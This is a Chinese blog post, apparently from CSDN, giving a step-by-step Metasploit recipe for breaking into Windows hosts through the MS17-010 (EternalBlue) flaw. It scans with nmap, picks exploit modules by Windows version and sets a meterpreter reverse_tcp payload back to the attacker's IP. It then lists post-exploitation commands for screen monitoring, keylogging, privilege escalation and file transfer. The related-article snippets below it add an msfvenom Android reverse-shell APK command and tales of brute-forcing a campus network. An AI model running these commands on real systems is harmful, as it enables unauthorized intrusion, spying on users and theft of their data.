kali metsploit 工具入侵windows

最新推荐文章于 2024-06-05 09:59:26 发布
最新推荐文章于 2024-06-05 09:59:26 发布
阅读量8.2k 收藏 165
点赞数 20
文章标签: 永恒之蓝 入侵windows ms17-010
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41743240/article/details/87906504
版权

入侵漏洞:ms17_010

请勿用于非法用途

第一步:

发现存活主机

nmap -sn 192.168.1.0/24

 

 

第二步:

扫描漏洞

nmap -T4 --script vuln 192.168.0.107

扫描到漏洞smb-vuln-ms17-010(永恒之蓝)

第三步:

打开metasploit

msfconsole

 

第四步:

查找ms17-010漏洞

search ms17-010

选择漏洞模块

win2003/winxp版本选用:exploit/windows/smb/ms17_010_psexec

win7/win2008选用: exploit/windows/smb/ms17_010_eternalblue

win8/win8.1选用:exploit/windows/smb/ms17_010_eternalblue_win8

这里是win2003所以输入

use exploit/windows/smb/ms17_010_psexec

查看模块属性

show options

 

设置目标ip

set rhosts 192.168.0.107

设置载块

set payload windows/meterpreter/reverse_tcp

设置自己的主机ip

set lhost 192.168.0.105

查看属性

show options

开始渗透

exploit

 

第五步:

现在已经得到了meterpreter的回话

打开vnc屏幕监控

run vnc

其他命令:

screenshot                #屏幕截图

shell                         #打开目标cmd

keyscan_start             #开启键盘监听

keyscan_dump             #查看监听记录

keyscan_stop               #停止监听

getsystem                     #提权

upload a.exe  c:/            #上传文件到c:/

download c:/a.exe /root  #下载文件到root目录

ps                                #查看进程

kill 2312                        #关闭pid为2312的进程

 

 

 

 

 

 

 

0kam1
关注
  • 20
    点赞
  • 165
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
入侵某学校校园网过程
goddemon
05-28 3万+
校园网一直被喷垃圾 因此一直也没开过校园网,一直都是手机热点续命,也正是因为这个,电脑打开wifi连接的时候,一不小心就跳转到了校园网连接界面去了,又因为本来自己的浏览器就挂了代理的 登录界面如下 于是正常的用burp抓了下网页的包 发现密文这些都没有任何的加密,类似于这个,密文直接没有任何的加密,还没有验证码机制 于是习惯性的用burp的攻击模块跑了下包,爆破了一些密码出来,跑了几个小时应该随便弄出来300多个吧(涉及到隐私因此疯狂打码) 你以为这样我就满足了? 不可能这样的,作为一个渗透手,要么就
Kali Linux 暴力破解学校办公室WiFi 总结
m0_58837469的博客
04-06 1万+
脑子里最开始萌生出这个想法的起因是在闲逛博客的时候看见的一篇kali Linux网络渗透的一篇文章。我决定把对面办公室的网络破解了。(刚入门计算机这个专业的黑客梦) 电脑装VMware、kali Linux、准备一块网卡(网卡要兼容kali Linux、我用的是RT3070L)、能敲键盘的手(脚也行) 装网卡(RT3070L)时出现的问题:虚拟机识别不了。必须要让虚拟机单练网卡才可以解决 Ctrl+shift+T 打开终端——> sudo su 输入密码 获取 root 权限—...
kali系统渗透window实现屏幕监控
鸣风
12-23 1万+
kali系统渗透window实现屏幕监控
如何使用kali入侵(渗透)一台windows
最新发布
zz12345600354的博客
06-05 485
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
kali安装配置snort实现简单的入侵检测
阿渌的博客札记
11-28 7258
kali安装配置snort实现简单的入侵检测 参考 kali上安装配置snort以及简单实验(这篇是我安装过程中最为简洁的,也是错误较少的); Ubuntu 16.04安装snort含问题解决(示例代码)(这篇里面包含常见错误,虽然我出现的错误并没有解决); 前言 snort这个东西真的是魔鬼,前前后后在四个系统上安装了不知道多少次,最后终于在搭载了Ubuntu18的云服务器勉强安装完成。 安装失败的主要原因 网络不顺畅(这个也是以下很多原因出现的主要原因); 依赖环境安装不全; 配置失败的主要原因
最好的入侵linux教程
最实用的Linux博客
09-25 2403
原贴:http://www.vipcn.com/InfoView/Article_182535.html最好的入侵linux教程一:基本知识     1:常见UNIX版本:   SCO UNIX,Sunos,Solaris,HP-UX,Digtal,Unix,IRIX,AIX,Linux,FreeBSD, 386BSD,A/UX,BSD,BSD-LITE,Goherent,Dynix,Hu
kali入侵win7.txt
07-23
整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
kali工具使用.pdf
09-14
kali工具使用.pdf
kali linux 工具
04-20
kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali ...
Kali系统工具说明.docx
09-25
文档里是对kali操作系统自带的工具的介绍、选项以及简单的使用说明,尽可能把所有工具都写了进去,常用的工具都做了详细说明(图文并茂),不常用的也做了介绍说明,希望给予大家参考帮助
kali系统-工具-中文手册-html版
07-15
Kali Linux Tools 中文說明書 nmap包说明 NMAP(“网络映射”)是一个自由和开放源码(许可证)工具进行网络发现和安全审计。许多系统和网络管理员也觉得有用,如网络库存,管理服务升级计划和监控主机或服务的正常...
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使您可以跟踪您的访问。
使用无线信号特性,查找和终结快捷宾馆中摄像头的一种方法 (无线安全?一点都不安全 开篇)
lixiangminghate的专栏
12-14 2037
各位在快捷宾馆住宿时有没有遇到或者担心遇到什么糟心事?被针孔摄像头偷拍算不算一件很糟心的事?本文提出一种方法来应对这种情况。 针孔摄像头拍摄后势必会通过网络将视屏传送给安装者。由于针孔摄像头的隐蔽性,摄像头不会使用有线网络,剩下的选项就是无线网络了。无线网络有2种选项:a.插入SIM卡,通过4G网络传输;b.使用快捷酒店会提供的WIFI。选项b的投入比选项a小,而且便于集成,另外...
kali常用的扫描方式
qq_42877870的博客
03-22 3396
1.基于 Nmap 的扫描方式 Nmap,也就是 Network Mapper,最早是 Linux 下的网络扫描和嗅探工具包。 nmap -sS xxxx(ip) #其中sS为半连接,这样更安全 nmap -sS xxxx(ip) -p xxx(端口) #可以接多个端口 2.NC扫描 nc 是 netcat 的简写,有着网络界的瑞士军函美誉。因为它短小精悍、功能实用,被设计为一个简单、 可...
kali入侵Android实验
weixin_42727740的博客
06-05 5142
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP地址(攻击机) LPORT= 4444 R> apk.apk(生成apk的路径及包名) android的安装包需要签名才能安装到android上,所以要先创建密钥库然后进行签名 keytool -genkey -v -keystore my-release-key.Keystore -a...
渗透过程中可能要用到的Kali工具小总结
weixin_50464560的博客
08-03 2603
渗透过程中可能要用到的Kali工具小总结 写在最前面 最近在搞渗透的时候,发现过程中有一些kali工具还是很适合使用的 所以写一个渗透过程中可能用到的kali渗透工具的小小总结 写的不对 多多包涵 各位大佬轻喷 :D Kali用得好 牢饭准管饱 渗透不规范 亲人两行泪 先来了解一下Kali(From Wikipdeia) Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Of...
我是如何一步一步渗透校园网服务器的
热门推荐
R4bbit
12-20 4万+
(1)信息收集 从校园网登录认证的web服务器入手 认证登录URL: http://10.0.0.2:9090/zportal/loginForWeb?wlanuserip=a7366ddc0f7012124df59542a882d7f2&wlanacname=c26c295bb262381f&ssid=&nasip=3dac9c253b8a73863be917b781d
kali-sqlmap-asp网站渗透
土豆大叔的博客
01-08 2352
kali-sqlmap-asp网站渗透
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值